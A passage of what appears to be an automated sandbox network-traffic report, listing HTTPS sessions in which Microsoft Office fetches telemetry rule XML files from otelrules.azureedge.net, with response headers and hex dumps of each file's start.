                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:05 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    140192.168.2.64984613.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:05 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:05 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:05 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1362
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE54CA33F"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: c769dbbb-401e-0048-7acc-450409000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010105Z-1746fd949bdjrnwqhC1EWRpg2800000000kg00000000449p
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:05 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    141192.168.2.64984713.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:05 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:06 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:06 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1409
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDFC438CF"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 4b51cdc8-701e-005c-68c7-43bb94000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010106Z-174f78459685m244hC1EWRgp2c00000016dg00000000tatv
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:06 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    142192.168.2.64984813.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:06 UTC192OUTGET /rules/rule703450v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:07 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1372
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE6669CA7"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 8189778e-c01e-007a-5562-43b877000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010107Z-174f7845968j6t2phC1EWRcfe800000016y0000000004h75
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:07 UTC1372INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    143192.168.2.64984913.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:06 UTC192OUTGET /rules/rule700901v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:07 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1408
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE1038EF2"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 5188202c-b01e-003e-05cd-458e41000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010107Z-1746fd949bdjrnwqhC1EWRpg2800000000gg000000004b5f
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:07 UTC1408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    144192.168.2.64985013.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:07 UTC192OUTGET /rules/rule700900v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:07 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1371
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BED3D048D"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 24400213-201e-005d-7ed2-45afb3000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010107Z-1746fd949bd9x4mhhC1EWRb76n00000000gg000000001vva
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:07 UTC1371INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6f 66 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    145192.168.2.64985113.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:07 UTC192OUTGET /rules/rule702251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:11 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1389
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE0F427E7"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: d3851fcf-901e-007b-6bcc-45ac50000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010110Z-1746fd949bdmv56chC1EWRypnn00000000g000000000aegx
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:11 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    146192.168.2.64985213.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:08 UTC192OUTGET /rules/rule702250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:08 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:08 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1352
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDD0A87E5"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 65690675-e01e-000c-7ccc-458e36000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010108Z-174f784596886s2bhC1EWR743w00000016u0000000005e56
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:08 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    147192.168.2.64985313.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:09 UTC192OUTGET /rules/rule702651v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:09 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1395
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDEC600CC"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 1a277fad-001e-0049-44d3-455bd5000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010109Z-1746fd949bdjrnwqhC1EWRpg2800000000e0000000004k80
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:09 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 36 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 65 64 69 61 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 65 64 69
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702651" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMedi


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    148192.168.2.64985413.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:09 UTC192OUTGET /rules/rule702650v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
